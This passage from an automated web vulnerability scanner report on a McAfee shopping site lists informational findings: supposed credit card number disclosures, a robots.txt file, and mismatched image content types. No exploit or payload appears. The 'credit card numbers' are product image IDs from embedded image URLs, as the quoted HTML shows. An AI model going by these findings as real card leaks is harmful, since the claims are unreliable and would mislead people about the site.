6.14. http://secureshopping.mcafee.com/browse/computers/accessories/camcorder-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/camcorder-accessories/

Issue detail

The following credit card numbers were disclosed in the response:

5846664771001005
5846734871001005

Request

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:12 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:12 GMT
Content-Length: 52249

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Camcorder Accessories at McAfee Secure Shopping - Search, Discov
...[SNIP]...
<img width=100 height=100 src="http://image.become.com/imageserver/s7/584673487-100-100-5-0/" border=0 alt="JVC DV Cable, 4 Pin to 6 Pin Interfaces Camera to Fire Wire Device">
...[SNIP]...
<img width=100 height=100 src="http://image.become.com/imageserver/s7/584666477-100-100-5-0/" border=0 alt="Elinchrom EL Skyport, Computer Remote Flash Trigger Set">
...[SNIP]...

6.15. http://secureshopping.mcafee.com/browse/computers/accessories/headphones/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/headphones/

Issue detail

The following credit card number was disclosed in the response:

5847318211001005

Request

Response

6.16. http://secureshopping.mcafee.com/browse/computers/accessories/monitor-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/monitor-accessories/

Issue detail

The following credit card numbers were disclosed in the response:

3545602861001005
4555635551001005

Request

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:18 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:18 GMT
Content-Length: 57067

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Monitor Accessories at McAfee Secure Shopping - Search, Discover
...[SNIP]...
<img width=100 height=100 src="http://image.become.com/imageserver/s5/455563555-100-100-5-0/" border=0 alt="Power Cord, UL / CSA, Color Black, 16 AWG, 6 ft">
...[SNIP]...
<img width=100 height=100 src="http://image.become.com/imageserver/s6/354560286-100-100-5-0/" border=0 alt="3M-MicroTouch M170 FPD Touch Monitor Touchscreen Display (11-91378-225)">
...[SNIP]...

6.17. http://secureshopping.mcafee.com/browse/computers/accessories/mp3-player-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/mp3-player-accessories/

Issue detail

The following credit card number was disclosed in the response:

4663898661001005

Request

Response

6.18. http://secureshopping.mcafee.com/browse/computers/accessories/notebook-pda-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/notebook-pda-accessories/

Issue detail

The following credit card number was disclosed in the response:

3545599331001005

Request

Response

6.19. http://secureshopping.mcafee.com/browse/computers/accessories/paper-supplies/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/paper-supplies/

Issue detail

The following credit card number was disclosed in the response:

4734753481001005

Request

Response

6.20. http://secureshopping.mcafee.com/browse/computers/accessories/remote-controls/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/remote-controls/

Issue detail

The following credit card numbers were disclosed in the response:

5846664771001005
5846671321001005

Request

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:33 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:33 GMT
Content-Length: 52650

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Remote Controls at McAfee Secure Shopping - Search, Discover &am
...[SNIP]...
<img width=100 height=100 src="http://image.become.com/imageserver/s7/584666477-100-100-5-0/" border=0 alt="Elinchrom EL Skyport, Computer Remote Flash Trigger Set">
...[SNIP]...
<img width=100 height=100 src="http://image.become.com/imageserver/s2/584667132-100-100-5-0/" border=0 alt="CP-X608 MultiMedia Projector (1024 x 768 XGA - 15.6lb)">
...[SNIP]...

6.21. http://secureshopping.mcafee.com/browse/computers/accessories/scanner-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/scanner-accessories/

Issue detail

The following credit card numbers were disclosed in the response:

3545599331001005
5845732991001005

Request

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:34 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:34 GMT
Content-Length: 54229

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Scanner Accessories at McAfee Secure Shopping - Search, Discover
...[SNIP]...
<img width=100 height=100 src="http://image.become.com/imageserver/s9/584573299-100-100-5-0/" border=0 alt="Symbol DS3408 Barcode Scanner (DS3408-SF20005R)">
...[SNIP]...
<img width=100 height=100 src="http://image.become.com/imageserver/s3/354559933-100-100-5-0/" border=0 alt="Symbol WT 4090 Handheld Mobile Computer (WT4090-N2H1GER)">
...[SNIP]...

6.22. http://secureshopping.mcafee.com/browse/computers/cables-adapters/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/cables-adapters/

Issue detail

The following credit card number was disclosed in the response:

5845729021001005

Request

Response

6.23. http://secureshopping.mcafee.com/browse/computers/handhelds-pda/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/handhelds-pda/

Issue detail

The following credit card number was disclosed in the response:

3545599331001005

Request

Response

6.24. http://secureshopping.mcafee.com/browse/computers/monitors/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/monitors/

Issue detail

The following credit card numbers were disclosed in the response:

3545602861001005
4555635551001005

Request

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:52 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:52 GMT
Content-Length: 55334

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Monitors at McAfee Secure Shopping - Search, Discover & Comp
...[SNIP]...
<img width=100 height=100 src="http://image.become.com/imageserver/s5/455563555-100-100-5-0/" border=0 alt="Power Cord, UL / CSA, Color Black, 16 AWG, 6 ft">
...[SNIP]...
<img width=100 height=100 src="http://image.become.com/imageserver/s6/354560286-100-100-5-0/" border=0 alt="3M-MicroTouch M170 FPD Touch Monitor Touchscreen Display (11-91378-225)">
...[SNIP]...

6.25. http://secureshopping.mcafee.com/browse/computers/network-communications/bridges,-routers,-gateways/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/network-communications/bridges,-routers,-gateways/

Issue detail

The following credit card number was disclosed in the response:

5845587791001005

Request

Response

6.26. http://secureshopping.mcafee.com/browse/music/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/music/

Issue detail

The following credit card number was disclosed in the response:

5845350521001005

Request

Response

6.27. http://secureshopping.mcafee.com/hot-products previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/hot-products

Issue detail

The following credit card numbers were disclosed in the response:

4497744081001005
4734632651001005
5312948641001005

Request

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:53:06 GMT
Content-Length: 97577

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>McAfee Secure Shopping</title>
<meta name="description" content="Your
...[SNIP]...
<img width=100 height=100 src="http://image.become.com/imageserver/s4/531294864-100-100-5-0/" alt=""
border=0>
...[SNIP]...
<img width=100 height=100 src="http://image.become.com/imageserver/s5/473463265-100-100-5-0/" alt=""
border=0>
...[SNIP]...
<img width=100 height=100 src="http://image.become.com/imageserver/s8/449774408-100-100-5-0/" alt=""
border=0>
...[SNIP]...

7. Robots.txt file previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: secureshopping.mcafee.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
ETag: "5D7pOrfoUn4"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Content-Type: text/plain; charset=utf-8
Content-Length: 497
Date: Sat, 25 Dec 2010 03:29:42 GMT

User-agent: *
Disallow: /js/
Disallow: /css/
Disallow: /error/
Disallow: /shop/*?brand=*
Disallow: /shop/*?merchant=*
Disallow: /shop/*?rating=*
Disallow: /shop/*?priceMin=*
Disallow: /shop/*?
...[SNIP]...

8. Content type incorrectly stated previous
There are 4 instances of this issue:

/images/favicon.ico
/images/star_half.png
/images/star_off.png
/images/star_on.png

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

8.1. http://secureshopping.mcafee.com/images/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://secureshopping.mcafee.com
Path:	/images/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

Response

8.2. http://secureshopping.mcafee.com/images/star_half.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://secureshopping.mcafee.com
Path:	/images/star_half.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png; charset=utf-8

The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

Response

8.3. http://secureshopping.mcafee.com/images/star_off.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://secureshopping.mcafee.com
Path:	/images/star_off.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png; charset=utf-8

The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

Response

8.4. http://secureshopping.mcafee.com/images/star_on.png previous

Summary

Severity:	Information
Confidence:	Firm
Host:	http://secureshopping.mcafee.com
Path:	/images/star_on.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png; charset=utf-8

The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

Response

Report generated by XSS.CX at Mon Dec 27 10:30:19 CST 2010.

secureshopping.mcafee.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

Cross Site Scripting in secureshopping.mcafee.com | Vulnerability Crawler Report

Contents

Contents

Issue background

Issue remediation

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Issue background

Issue remediation

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Issue background

Issue remediation

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail